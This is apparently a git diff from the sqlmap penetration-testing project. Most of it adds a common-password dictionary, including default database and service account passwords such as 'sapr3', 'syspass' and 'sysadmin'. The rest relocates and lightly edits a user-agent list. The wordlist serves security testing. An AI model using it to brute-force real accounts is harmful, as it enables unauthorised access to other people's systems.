+radical
+radio
+radiohea
+rafael
+rafaeltqm
+rafiki
+rage
+ragnarok
+rahatphan
+raider
+raiders
+Raiders
+raiders1
+railroad
+rain
+rainbow
+rainbow1
+rainbow6
+rainbows
+raindrop
+rainman
+rainyday
+raistlin
+Raistlin
+raleigh
+rallitas
+ralph
+ram
+rambler
+rambo
+rambo1
+ramirez
+ramona
+ramones
+rampage
+ramrod
+ramses
+ramsey
+ramzobur
+ranch
+rancid
+randall
+random
+Random
+randy
+randy1
+rang
+ranger
+ranger1
+rangers
+rangers1
+raphael
+raptor
+rapture
+raquel
+rascal
+rasdzv3
+rasputin
+rasta
+rasta1
+rastafarian
+ratboy
+rated
+ratio
+ratman
+raven
+raven1
+ravens
+raymond
+rayray
+razor
+razz
+re
+reader
+readers
+reading
+ready
+reagan
+real
+reality
+really
+realmadrid
+reaper
+reason
+rebecca
+Rebecca
+rebecca1
+rebel
+rebel1
+rebels
+reckless
+record
+records
+recovery
+red
+red123
+redalert
+redbaron
+redbird
+redbone
+redbull
+redcar
+redcloud
+reddevil
+reddog
+reddwarf
+redeye
+redfish
+redfox
+redhat
+redhead
+redhot
+redline
+redman
+redneck
+redred
+redrose
+redrum
+reds
+redskin
+redskins
+redsox
+redsox1
+redwing
+redwings
+redwood
+reebok
+reed
+reefer
+referee
+reflex
+reggae
+reggie
+regina
+reginald
+regional
+register
+reilly
+rejoice
+reliant
+reload
+remember
+remingto
+remote
+renault
+rene
+renee
+renegade
+reng
+rental
+repadmin
+repair
+replicate
+report
+reports
+rep_owner
+reptile
+republic
+republica
+requiem
+rescue
+research
+reserve
+resident
+respect
+retard
+retire
+retired
+revenge
+review
+revolution
+revolver
+rex
+reynolds
+reznor
+rg
+rghy1234
+rhiannon
+rhino
+rhjrjlbk
+rhonda
+rhx
+ricardo
+ricardo1
+rich
+richard
+richard1
+richards
+richie
+richmond
+rick
+ricky
+rico
+ride
+rider
+riders
+ridge
+right
+rightnow
+riley
+rimmer
+ring
+ringo
+ripken
+ripley
+ripper
+ripple
+risc
+rita
+river
+rivera
+rivers
+rje
+rla
+rlm
+rmail
+rman
+road
+roadkill
+roadking
+roadrunn
+roadrunner
+roadster
+rob
+robbie
+robby
+robert
+Robert
+robert1
+roberta
+roberto
+roberts
+robin
+robin1
+robinhood
+robins
+robinson
+robocop
+robot
+robotech
+robotics
+robyn
+roche
+rochelle
+rochester
+rock
+rocker
+rocket
+rocket1
+rockets
+rockford
+rockhard
+rockie
+rockies
+rockin
+rocknrol
+rocknroll
+rockon
+rocks
+rockstar
+rockstar1
+rockwell
+rocky
+rocky1
+rodent
+rodeo
+rodman
+rodney
+roger
+roger1
+rogers
+rogue
+roland
+rolex
+roll
+roller
+rollin
+rolling
+rollins
+rolltide
+roman
+romance
+romano
+romans
+romantico
+romeo
+romero
+rommel
+ronald
+ronaldo
+rong
+roni
+ronica
+ronnie
+roofer
+rookie
+rooney
+rooster
+root
+root123
+rootbeer
+rootroot
+rosario
+roscoe
+rose
+rosebud
+rosemary
+roses
+rosie
+rosita
+ross
+rossigno
+roswell
+rotten
+rouge
+rough
+route66
+rover
+rovers
+roxanne
+roxy
+roy
+royal
+royals
+royalty
+rr123456rr
+rrrr
+rrrrr
+rrrrrr
+rrrrrrrr
+rrs
+ruan
+rubber
+rubble
+ruben
+ruby
+rudeboy
+rudolf
+rudy
+rufus
+rugby
+rugby1
+rugger
+rules
+rumble
+runaway
+runescape
+runner
+running
+rupert
+rush
+rush2112
+ruslan
+russel
+russell
+Russell
+russia
+russian
+rusty
+rusty1
+rusty2
+ruth
+ruthie
+ruthless
+ryan
+s123456
+sabbath
+sabina
+sabine
+sabres
+sabrina
+sabrina1
+sadie
+sadie1
+safari
+safety
+safety1
+sahara
+saigon
+sailboat
+sailing
+sailor
+saint
+saints
+sairam
+saiyan
+sakura
+sal
+salami
+salasana
+salasona
+saleen
+salem
+sales
+sally
+sally1
+salmon
+salomon
+salope
+salou25
+salut
+salvador
+salvation
+sam
+sam123
+samantha
+samantha1
+sambo
+samiam
+samIam
+samm
+sammie
+sammy
+Sammy
+sammy1
+samoht
+sample
+sampleatm
+sampson
+samsam
+samson
+samsung
+samsung1
+samuel
+samuel22
+samurai
+sanane
+sanchez
+sancho
+sand
+sander
+sanders
+sandi
+sandie
+sandiego
+sandman
+sandra
+sandrine
+sandro
+sandwich
+sandy
+sandy1
+sanford
+sanfran
+sang
+sanity
+sanjose
+santa
+santafe
+santana
+santiago
+santos
+santoysena
+sap
+saphire
+sapper
+sapphire
+sapr3
+sara
+sarah
+sarah1
+saratoga
+sarita
+sasasa
+sascha
+sasha
+sasha1
+saskia
+sassy
+sassy1
+sasuke
+satan
+satan666
+satori
+saturday
+saturn
+Saturn
+saturn5
+sauron
+sausage
+sausages
+savage
+savanna
+savannah
+savior
+sawyer
+saxon
+sayang
+sbdc
+scamper
+scania
+scanner
+scarecrow
+scarface
+scarlet
+scarlett
+schalke
+schatz
+scheisse
+scheme
+schmidt
+schnapps
+school
+school1
+science
+scissors
+scooby
+scooby1
+scoobydo
+scoobydoo
+scooter
+scooter1
+score
+scorpio
+scorpio1
+scorpion
+scotch
+scotland
+scott
+scott1
+scottie
+scotty
+scout
+scouts
+scrabble
+scrapper
+scrappy
+scratch
+scream
+screamer
+screen
+screw
+screwy
+script
+scrooge
+scruffy
+scuba
+scuba1
+scully
+sdos_icsap
+seabee
+seadoo
+seagate
+seagull
+seahawks
+seamus
+sean
+searay
+search
+season
+seattle
+sebastia
+sebastian
+sebring
+secdemo
+second
+secret
+secret1
+secret3
+secrets
+secure
+security
+sedona
+seeker
+seeking
+seinfeld
+select
+selena
+selina
+seminole
+semper
+semperfi
+senator
+senators
+seneca
+seng
+senha
+senior
+senna
+sensei
+sensor
+sentinel
+seoul
+septembe
+september
+septiembre
+serega
+serena
+serenity
+sergeant
+sergei
+sergey
+sergio
+series
+serpent
+servando
+server
+service
+Service
+serviceconsumer1
+services
+sesame
+sestosant
+seven
+seven7
+sevens
+sex
+sex123
+sex4me
+sex69
+sexgod
+sexman
+sexo
+sexsex
+sexsexsex
+sexual
+sexx
+sexxx
+sexxxx
+sexxxy
+sexxy
+sexy
+sexy1
+sexy12
+sexy123
+sexy69
+sexybabe
+sexyboy
+sexygirl
+sexylady
+sexyman
+sexysexy
+seymour
+sf49ers
+sh
+shadow
+Shadow
+shadow1
+shadow12
+shadows
+shag
+shaggy
+shai
+shakira
+shalom
+shaman
+shampoo
+shamrock
+shamus
+shan
+shane
+shang
+shanghai
+shania
+shanna
+shannon
+shannon1
+shanny
+shanti
+shao
+shaolin
+sharc
+share
+shark
+sharks
+sharky
+sharon
+sharp
+shasta
+shauna
+shaved
+shawn
+shawna
+shayne
+shazam
+shearer
+sheba
+sheba1
+sheeba
+sheena
+sheep
+sheepdog
+sheffield
+shei
+sheila
+shelby
+sheldon
+shell
+shelley
+shelly
+shelter
+shelves
+shemale
+shen
+sheng
+shepherd
+sheridan
+sheriff
+sherlock
+sherman
+sherri
+sherry
+sherwood
+shibby
+shiloh
+shiner
+shinobi
+ship
+shirley
+shit
+shitface
+shithead
+shitty
+shiva
+shivers
+shock
+shocker
+shodan
+shoes
+shogun
+shojou
+shonuf
+shooter
+shopper
+shopping
+short
+shorty
+shorty1
+shotgun
+shou
+shovel
+show
+shower
+showme
+showtime
+shrimp
+shuai
+shuang
+shui
+shun
+shuo
+shuttle
+shutup
+shyshy
+sick
+sidekick
+Sidekick
+sidney
+siemens
+sierra
+Sierra
+sifra
+sifre
+sigma
+sigmachi
+signal
+signature
+si_informtn_schema
+silence
+silent
+silly
+silver
+silver1
+silverad
+silvia
+simba
+simba1
+simmons
+simon
+simon1
+simona
+simone
+simple
+simpson
+simpsons
+sims
+simsim
+sinatra
+sinbad
+sinclair
+sinegra
+singapor
+singer
+single
+sinister
+sinned
+sinner
+siobhan
+sirius
+sisma
+sissy
+sister
+sister12
+sisters
+site
+siteminder
+sites
+sithlord
+sixers
+sixpack
+sixsix
+sixty
+sixty9
+skate
+skater
+skater1
+skeeter
+Skeeter
+skibum
+skidoo
+skiing
+skillet
+skinhead
+skinner
+skinny
+skip
+skipper
+skipper1
+skippy
+skittles
+skull
+skunk
+skydive
+skyhawk
+skylar
+skylark
+skyler
+skyline
+skywalke
+skywalker
+slacker
+slamdunk
+slammer
+slapper
+slappy
+slapshot
+slaptazodis
+slater
+slave
+slave1
+slayer
+slayer1
+sleep
+sleeper
+sleepy
+slick
+slick1
+slidepw
+slider
+slim
+slimshad
+slinky
+slip
+slipknot
+slipknot1
+slipknot666
+slippery
+sloppy
+slowhand
+slugger
+sluggo
+slut
+sluts
+slutty
+smackdow
+small
+smart
+smart1
+smashing
+smeghead
+smegma
+smelly
+smile
+smile1
+smiles
+smiley
+smirnoff
+smith
+smiths
+smitty
+smoke
+smoke1
+smoker
+smokes
+smokey
+Smokey
+smokey1
+smokie
+smokin
+smoking
+smooch
+smooth
+smoothie
+smother
+smudge
+smurfy
+smut
+snake
+snake1
+snakes
+snapon
+snapper
+snapple
+snappy
+snatch
+sneakers
+sneaky
+snicker
+snickers
+sniffing
+sniper
+snooker
+snoop
+snoopdog
+snoopy
+Snoopy
+snoopy1
+snow
+snowball
+snowbird
+snowboar
+snowboard
+snowfall
+snowflak
+snowflake
+snowman
+snowski
+snuffy
+snuggles
+soap
+sober1
+soccer
+soccer1
+soccer10
+soccer12
+soccer2
+socrates
+softail
+softball
+software
+solaris
+soldier
+soledad
+soleil
+solitude
+solo
+solomon
+solution
+some
+somebody
+someday
+someone
+somerset
+somethin
+something
+sommer
+sonata
+sondra
+song
+sonia
+sonic
+sonics
+sonny
+sonoma
+sonrisa
+sony
+sonya
+sonyfuck
+sonysony
+sooner
+sooners
+sophia
+sophie
+soprano
+sossina
+soto
+soul
+soulmate
+sound
+south
+southern
+southpar
+southpark
+southpaw
+southside1
+sowhat
+soyhermosa
+space
+spaceman
+spain
+spam
+spanish
+spank
+spanker
+spanking
+spankme
+spanky
+spanner
+sparkle
+sparkles
+sparks
+sparky
+Sparky
+sparky1
+sparrow
+sparrows
+sparta
+spartan
+spartan1
+spartans
+spawn
+spazz
+speaker
+speakers
+spears
+special
+specialk
+spectre
+spectrum
+speed
+speedo
+speedway
+speedy
+Speedy
+spence
+spencer
+spencer1
+sperma
+sphinx
+sphynx
+spice
+spider
+spider1
+spiderma
+spiderman
+spiderman1
+spidey
+spierson
+spike
+spike1
+spiker
+spikes
+spikey
+spinner
+spiral
+spirit
+spit
+spitfire
+splash
+spliff
+splinter
+spock
+spoiled
+sponge
+spongebo
+spongebob
+spongebob1
+spooge
+spooky
+spoon
+spoons
+sport
+sporting
+sports
+sporty
+spot
+spotty
+spread
+spring
+springer
+springs
+sprint
+sprinter
+sprite
+sprocket
+sprout
+spud
+spunky
+spurs
+spurs1
+sputnik
+spyder
+sql
+sqlexec
+squall
+square
+squash
+squeak
+squeeze
+squires
+squirrel
+squirt
+srinivas
+ssp
+sss
+ssss
+sssss
+ssssss
+sssssss
+ssssssss
+stacey
+staci
+stacie
+stacy
+stafford
+stalin
+stalker
+stallion
+stan
+standard
+stanford
+stang
+stanley
+staples
+star
+star69
+starbuck
+starcraf
+starcraft
+stardust
+starfire
+starfish
+stargate
+starligh
+starlight
+starman
+starr
+stars
+starship
+starstar
+start
+start1
+starter
+startfinding
+startrek
+starwars
+starwars1
+state
+static
+station
+status
+Status
+stayout
+stealth
+steel
+steele
+steeler
+steelers
+steelers1
+stefan
+stefanie
+stefano
+steffen
+steffi
+stella
+stellar
+steph
+steph1
+stephan
+stephane
+stephani
+stephanie
+stephanie1
+stephen
+stephen1
+stephi
+stereo
+sterling
+Sterling
+steve
+steve1
+steven
+Steven
+steven1
+stevens
+stevie
+stewart
+stick
+stickman
+sticks
+sticky
+stiffy
+stimpy
+sting
+sting1
+stinger
+stingray
+stinker
+stinky
+stivers
+stock
+stocking
+stocks
+stockton
+stolen
+stone
+stone1
+stonecol
+stonecold
+stoned
+stoner
+stones
+stoney
+stop
+storage
+store
+stories
+storm
+storm1
+stormy
+straight
+strange
+stranger
+strangle
+strap
+strat
+stratford
+strato
+strat_passwd
+stratus
+strawber
+strawberry
+stream
+streaming
+street
+streets
+strength
+stress
+stretch
+strider
+strike
+striker
+string
+strip
+stripper
+stroke
+stroker
+strong
+stryker
+stuart
+stubby
+stud
+student
+student2
+studio
+studly
+studman
+stuff
+stumpy
+stunner
+stupid
+stupid1
+stuttgart
+style
+styles
+stylus
+suan
+subaru
+sublime
+submit
+suburban
+subway
+subzero
+success
+success1
+suck
+suckdick
+sucked
+sucker
+suckers
+sucking
+suckit
+suckme
+sucks
+sudoku
+sue
+sugar
+sugar1
+suicide
+sullivan
+sultan
+summer
+Summer
+summer1
+summer69
+summer99
+summers
+summit
+sumuinen
+sun
+sunbird
+sundance
+sunday
+sundevil
+sunfire
+sunflowe
+sunflower
+sunlight
+sunny
+sunny1
+sunnyday
+sunrise
+sunset
+sunshine
+Sunshine
+sunshine1
+super
+super1
+super123
+superb
+superfly
+superior
+superman
+Superman
+superman1
+supernov
+supersecret
+supersta
+superstage
+superstar
+superuser
+supervisor
+support
+supported
+supra
+supreme
+surf
+surfer
+surfing
+survivor
+susan
+susan1
+susana
+susanna
+susanne
+sushi
+susie
+sutton
+suzanne
+suzie
+suzuki
+suzy
+Sverige
+svetlana
+swallow
+swanson
+swearer
+sweden
+swedish
+sweet
+sweet1
+sweetheart
+sweetie
+sweetnes
+sweetness
+sweetpea
+sweets
+sweety
+swim
+swimmer
+swimming
+swinger
+swingers
+swinging
+switch
+switzer
+swoosh
+Swoosh
+sword
+swordfis
+swordfish
+swords
+swpro
+swuser
+sybil
+sydney
+sylveste
+sylvester
+sylvia
+sylvie
+symbol
+symmetry
+sympa
+synergy
+synthimatiko
+syracuse
+sys
+sysadm
+sysadmin
+sysman
+syspass
+sys_stnt
+system
+system5
+systempass
+systems
+syzygy
+tab
+tabasco
+tabatha
+tabitha
+taco
+tacobell
+tacoma
+taffy
+tahiti
+taiwan
+talbot
+talisman
+talks
+talon
+tamara
+tami
+tamie
+tammy
+tamtam
+tang
+tangerine
+tango
+tank
+tanker
+tanner
+tantra
+tanya
+tanya1
+tapani
+tape
+tara
+tardis
+targas
+target
+target123
+tarheel
+tarheels
+tarpon
+tarragon
+tartar
+tarzan
+tasha
+tasha1
+tata
+tatiana
+tattoo
+taurus
+Taurus
+taxman
+taylor
+Taylor
+taylor1
+tazdevil
+tazman
+tazmania
+tbird
+t-bone
+tbone
+tdos_icsap
+teacher
+team
+tech
+technics
+techno
+tectec
+teddy
+teddy1
+teddybea
+teddybear
+teen
+teenage
+teens
+teflon
+tekila
+tekken
+Telechargement
+telecom
+telefon
+telefono
+telephon
+telephone
+temp
+temp!
+temp123
+tempest
+templar
+temple
+temporal
+temporary
+temppass
+temptation
+temptemp
+tenchi
+tender
+tenerife
+teng
+tennesse
+tennis
+Tennis
+tequiero
+tequila
+terefon
+teresa
+terminal
+terminat
+terminator
+terra
+terrapin
+terrell
+terror
+terry
+terry1
+test
+test!
+test1
+test12
+test123
+test1234
+test2
+test3
+tester
+testi
+testing
+testing1
+testpass
+testpilot
+testtest
+test_user
+tetsuo
+texas
+texas1
+thailand
+thanatos
+thanks
+thankyou
+the
+theater
+theatre
+thebear
+thebest
+theboss
+thecat
+thecrow
+thecure
+thedog
+thedon
+thedoors
+thedude
+theend
+theforce
+thegame
+thegreat
+their
+thejudge
+thekid
+theking
+thelma
+thelorax
+theman
+theodore
+theone
+there
+theresa
+Theresa
+therock
+therock1
+these
+thesims
+thethe
+thewho
+thierry
+thing
+thinsamplepw
+thirteen
+this
+thisisit
+thomas
+Thomas
+thomas1
+thompson
+thong
+thongs
+thor
+thorne
+thrasher
+three
+threesom
+throat
+thuglife
+thumb
+thumbs
+thumper
+thunder
+Thunder
+thunder1
+thunderb
+thunderbird
+thursday
+thx1138
+tian
+tiao
+tibco
+tiberius
+tiburon
+ticket
+tickle
+tierno
+tiffany
+tiffany1
+tiger
+tiger1
+tiger123
+tiger2
+tigercat
+tigers
+tigers1
+tigger
+Tigger
+tigger1
+tigger2
+tight
+tightend
+tights
+tigre
+tika
+tim
+timber
+time
+timeout
+timmy
+timosha
+timosha123
+timothy
+timtim
+tina
+ting
+tinker
+tinkerbe
+tinkerbell
+tinkle
+tinman
+tintin
+tiny
+tip37
+tipper
+titan
+titanic
+titanium
+titans
+titimaman
+titleist
+titouf59
+tits
+titten
+titts
+titty
+tivoli
+tnt
+toast
+toaster
+tobias
+toby
+today
+todd
+toejam
+toffee
+together
+toggle
+toilet
+tokyo
+toledo
+tolkien
+tom
+tomahawk
+tomas
+tomato
+tomcat
+tommie
+tommy
+tommy1
+tommyboy
+tomorrow
+tomtom
+tong
+tongue
+tonight
+tony
+toocool
+tool
+toolbox
+toolman
+toon
+toonarmy
+tootie
+tootsie
+topcat
+topdog
+topgun
+tophat
+topher
+topography
+topper
+toriamos
+torino
+tornado
+toronto
+torpedo
+torres
+tortoise
+toshiba
+tosser
+total
+toto
+toto1
+tototo
+tottenha
+tottenham
+toucan
+touching
+tower
+towers
+town
+toxic
+toyota
+trace
+tracer
+tracey
+traci
+tracie
+track
+tracker
+tractor
+tracy
+trader
+traffic
+trailer
+trails
+train
+trainer
+training
+trains
+trance
+tranny
+trans
+transam
+transfer
+transit
+transport
+trapper
+trash
+trauma
+travel
+traveler
+travis
+tre
+treasure
+treble
+trebor
+tree
+treefrog
+trees
+treetop
+trek
+trevor
+trial
+triangle
+tribal
+tricia
+tricky
+trident
+trigger
+trinidad
+trinitro
+trinity
+trip
+triple
+tripleh
+tripod
+tripper
+trish
+trisha
+tristan
+triton
+triumph
+trivial
+trixie
+trojan
+trojans
+troll
+trombone
+trooper
+trophy
+tropical
+trouble
+trouble1
+trout
+troy
+truck
+trucker
+trucking
+trucks
+truelove
+truman
+trumpet
+trunks
+trust
+trustme
+trustno1
+truth
+tsdev
+tsunami
+tsuser
+tttttt
+tttttttt
+tty
+tuan
+tubas
+tucker
+tucson
+tudelft
+tuesday
+Tuesday
+tula
+tulips
+tuna
+tunafish
+tundra
+tunnussana
+tupac
+turbine
+turbo
+turbo1
+turbo2
+turkey
+turner
+turnip
+turtle
+tuscl
+tuttle
+tweety
+tweety1
+twelve
+twenty
+twiggy
+twilight
+twinkie
+twinkle
+twins
+twisted
+twister
+twitter
+tybnoq
+tycoon
+tyler
+tyler1
+typhoon
+tyrone
+tyson
+tyson1
+ultima
+ultimate
+ultra
+um_admin
+umbrella
+um_client
+umesh
+umpire
+undead
+underdog
+undertak
+undertaker
+underworld
+unhappy
+unicorn
+unicornio
+unique
+united
+unity
+universa
+universal
+universe
+universidad
+university
+unix
+unknown
+unreal
+upsilon
+uptown
+upyours
+uranus
+urchin
+ursula
+usa123
+usarmy
+user
+user0
+user1
+user2
+user3
+user4
+user5
+user6
+user7
+user8
+user9
+username
+usmarine
+usmc
+usnavy
+Usuckballz1
+util
+utility
+utlestat
+utopia
+uucp
+uuuuuu
+vacation
+vader
+vader1
+vagabond
+vagina
+val
+valencia
+valentin
+valentina
+valentinchoque
+valentine
+valeria
+valerie
+valeverga
+valhalla
+valkyrie
+valley
+vampire
+vampires
+vancouve
+vanessa
+vanessa1
+vanguard
+vanhalen
+vanilla
+vasant
+vauxhall
+vea
+vector
+vectra
+vedder
+vegas
+vegeta
+vegitto
+veh
+velo
+velocity
+velvet
+venice
+venom
+ventura
+venture
+venus
+veracruz
+verbatim
+veritas
+verizon
+vermont
+vernon
+Vernon
+verona
+veronica
+veronika
+versace
+vertex_login
+vertigo
+vette
+vfhbyf
+vfrcbv
+vh5150
+viagra
+vicki
+vickie
+vicky
+victor
+victor1
+victoria
+Victoria
+victoria1
+victory
+video
+videouser
+vienna
+vietnam
+viewsoni
+vif_dev_pwd
+viking
+vikings
+vikings1
+vikram
+villa
+village
+vincent
+Vincent
+vincent1
+vinnie
+vintage
+violet
+violin
+viper
+viper1
+vipergts
+vipers
+virago
+virgil
+virgin
+virginia
+virginie
+virtual
+virus
+viruser
+visa
+vision
+visitor
+visual
+vivian
+vladimir
+vodka
+volcano
+volcom
+volkswag
+volley
+volleyba
+volume
+volvo
+voodoo
+vortex
+voyager
+voyager1
+voyeur
+vrr1
+vrr2
+vsegda
+vulcan
+vvvv
+vvvvvv
+wachtwoord
+wachtwurd
+waffle
+wagner
+wagwoord
+waiting
+walden
+waldo
+walker
+wallace
+wall.e
+wallet
+walleye
+wally
+walmart
+walnut
+walrus
+walter
+walton
+wanderer
+wang
+wanker
+wanking
+wanted
+warcraft
+wareagle
+warez
+wargames
+warhamme
+warlock
+warlord
+warner
+warning
+warren
+warrior
+warrior1
+warriors
+warthog
+wasabi
+washburn
+washingt
+washington
+wasser
+wassup
+wasted
+watch
+watcher
+water
+water1
+waterboy
+waterloo
+Waterloo
+waters
+watford
+watson
+wayne
+wayne1
+wealth
+wearing
+weasel
+weather
+weaver
+web
+webber
+webcal01
+webdb
+webmaste
+webmaster
+webread
+webster
+Webster
+wedding
+wedge
+weed
+weed420
+weekend
+weenie
+weezer
+weiner
+weird
+welcome
+welcome1
+welcome123
+welder
+wendi
+wendy
+wendy1
+weng
+werder
+werdna
+werewolf
+werner
+wert
+wesley
+west
+western
+westham
+weston
+westside
+westwood
+wetpussy
+wetter
+wfadmin
+wg8e3wjf
+wh
+whale1
+what
+whatever
+whatever1
+whatnot
+whatsup
+whatthe
+whatwhat
+wheels
+whiplash
+whiskers
+whiskey
+whisky
+whisper
+whistler
+whit
+white
+white1
+whiteboy
+whiteout
+whitesox
+whitey
+whiting
+whitney
+whocares
+wholesale
+whore
+whoville
+whynot
+wibble
+wicked
+widget
+wiesenhof
+wifey
+wilbur
+wild
+wildbill
+wildcard
+wildcat
+wildcats
+wilder
+wildfire
+wildman
+wildone
+wildwood
+will
+william
+william1
+williams
+williamsburg
+willie
+willis
+willow
+Willow
+willy
+wilma
+wilson
+win95
+wind
+windmill
+window
+windows
+Windows
+windsor
+windsurf
+winger
+wingman
+wingnut
+wings
+winner
+winner1
+winners
+winnie
+Winnie
+winniethepooh
+winona
+winston
+winston1
+winter
+winter1
+wip
+wireless
+wisconsin
+wisdom
+wiseguy
+wishbone
+wives
+wizard
+wizard1
+wizards
+wkadmin
+wkproxy
+wksys
+wk_test
+wkuser
+wms
+wmsys
+woaini
+wob
+wolf
+wolf1
+wolf359
+wolfen
+wolfgang
+wolfie
+wolfman
+wolfpac
+wolfpack
+wolverin
+wolverine
+Wolverine
+wolves
+woman
+wombat
+wombat1
+women
+wonder
+wonderboy
+wood
+woodie
+woodland
+Woodrow
+woodstoc
+woodwind
+woody
+woody1
+woofer
+woofwoof
+woohoo
+wookie
+woowoo
+word
+wordpass
+wordup
+work
+work123
+working
+workout
+world
+World
+wormwood
+worship
+worthy
+wow12345
+wowwow
+wps
+wraith
+wrangler
+wrench
+wrestle
+wrestler
+wrestlin
+wrestling
+wright
+wrinkle1
+writer
+writing
+wsh
+wsm
+wutang
+www
+wwwuser
+wwww
+wwwwww
+wwwwwww
+wwwwwwww
+wxcvbn
+wyoming
+xademo
+xanadu
+xander
+xanth
+xavier
+xbox360
+xcountry
+xdp
+xerxes
+xfer
+x-files
+xfiles
+xian
+xiang
+xiao
+ximena
+ximenita
+xing
+xiong
+xla
+x-men
+xmodem
+xnc
+xni
+xnm
+xnp
+xns
+xprt
+xtr
+xtreme
+xuan
+xxx
+xxx123
+xxxx
+xxxxx
+xxxxxx
+xxxxxxx
+xxxxxxxx
+xyz
+xyz123
+xyzzy
+y
+yaco
+yamaha
+yamahar1
+yamato
+yang
+yankee
+yankees
+yankees1
+yankees2
+yasmin
+yaya
+yeah
+yeahbaby
+yellow
+yellow1
+yellowstone
+yes
+yeshua
+yessir
+yesyes
+yfnfif
+ying
+yoda
+yogibear
+yolanda
+yomama
+yong
+yosemite
+yoteamo
+youbye123
+young
+young1
+yourmom
+yourmom1
+your_pass
+yousuck
+yoyo
+yoyoma
+yoyoyo
+ysrmma
+ytrewq
+yuan
+yukon
+yummy
+yumyum
+yvette
+yvonne
+yyyy
+yyyyyy
+yyyyyyyy
+yzerman
+z123456
+zachary
+zachary1
+zack
+zag12wsx
+zander
+zang
+zanzibar
+zap
+zapata
+zapato
+zaphod
+zappa
+zapper
+zaq123
+zaq12wsx
+zaq1xsw2
+zaqwsx
+zaqxsw
+zebra
+zebras
+zeng
+zenith
+zephyr
+zeppelin
+zepplin
+zero
+zerocool
+zeus
+zhai
+zhang
+zhao
+zhei
+zheng
+zhong
+zhongguo
+zhou
+zhuai
+zhuang
+zhui
+zhun
+zhuo
+zidane
+ziggy
+zigzag
+zildjian
+zimmerman
+zipper
+zippo
+zippy
+zirtaeb
+zk.:
+zmodem
+zodiac
+zoltan
+zombie
+zong
+zoomer
+zoosk
+zorro
+zouzou
+zuan
+zwerg
+zxc
+zxc123
+zxccxz
+zxcv
+zxcvb
+Zxcvb
+zxcvbn
+zxcvbnm
+Zxcvbnm
+zxcvbnm1
+zxcvbnm123
+zxcxz
+zxczxc
+zxzxzx
+zzz
+zzzxxx
+zzzz
+zzzzz
+zzzzzz
+zzzzzzz
+zzzzzzzz
diff --git a/txt/user-agents.txt b/data/txt/user-agents.txt
similarity index 97%
rename from txt/user-agents.txt
rename to data/txt/user-agents.txt
index cb32978fc85..c65829aa646 100644
--- a/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,5 +1,5 @@
-# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
+# See the file 'LICENSE' for copying permission
# Opera
@@ -285,7 +285,6 @@ Opera/9.20 (X11; Linux i686; U; es-es)
Opera/9.20 (X11; Linux i686; U; pl)
Opera/9.20 (X11; Linux i686; U; ru)
Opera/9.20 (X11; Linux i686; U; tr)
-Opera/9.20 (X11; Linux ppc; U; en)
Opera/9.20 (X11; Linux x86_64; U; en)
Opera/9.21 (Macintosh; Intel Mac OS X; U; en)
Opera/9.21 (Macintosh; PPC Mac OS X; U; en)
@@ -364,8 +363,8 @@ Opera/9.27 (Windows NT 5.1; U; ja)
Opera/9.27 (Windows NT 5.2; U; en)
Opera/9.27 (X11; Linux i686; U; en)
Opera/9.27 (X11; Linux i686; U; fr)
-Opera 9.4 (Windows NT 5.3; U; en)
-Opera 9.4 (Windows NT 6.1; U; en)
+Opera/9.4 (Windows NT 5.3; U; en)
+Opera/9.4 (Windows NT 6.1; U; en)
Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
Opera/9.50 (Macintosh; Intel Mac OS X; U; en)
Opera/9.50 (Windows NT 5.1; U; es-ES)
@@ -375,7 +374,6 @@ Opera/9.50 (Windows NT 5.1; U; nn)
Opera/9.50 (Windows NT 5.1; U; ru)
Opera/9.50 (Windows NT 5.2; U; it)
Opera/9.50 (X11; Linux i686; U; es-ES)
-Opera/9.50 (X11; Linux ppc; U; en)
Opera/9.50 (X11; Linux x86_64; U; nb)
Opera/9.50 (X11; Linux x86_64; U; pl)
Opera/9.51 (Macintosh; Intel Mac OS X; U; en)
@@ -406,7 +404,6 @@ Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en)
Opera/9.52 (X11; Linux i686; U; cs)
Opera/9.52 (X11; Linux i686; U; en)
Opera/9.52 (X11; Linux i686; U; fr)
-Opera/9.52 (X11; Linux ppc; U; de)
Opera/9.52 (X11; Linux x86_64; U)
Opera/9.52 (X11; Linux x86_64; U; en)
Opera/9.52 (X11; Linux x86_64; U; ru)
@@ -616,7 +613,6 @@ Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02
# Mozilla Firefox
-mozilla/3.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/5.0.1
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)
Mozilla/4.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/2010324480 Firefox/3.5.4
Mozilla/4.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.7) Gecko/2008398325 Firefox/3.1.4
@@ -1125,7 +1121,7 @@ Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/
Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
-Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
+Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 5.2; sk; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
Mozilla/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko/20060214 Firefox/1.6a1
Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5
@@ -1355,7 +1351,7 @@ Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Fire
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
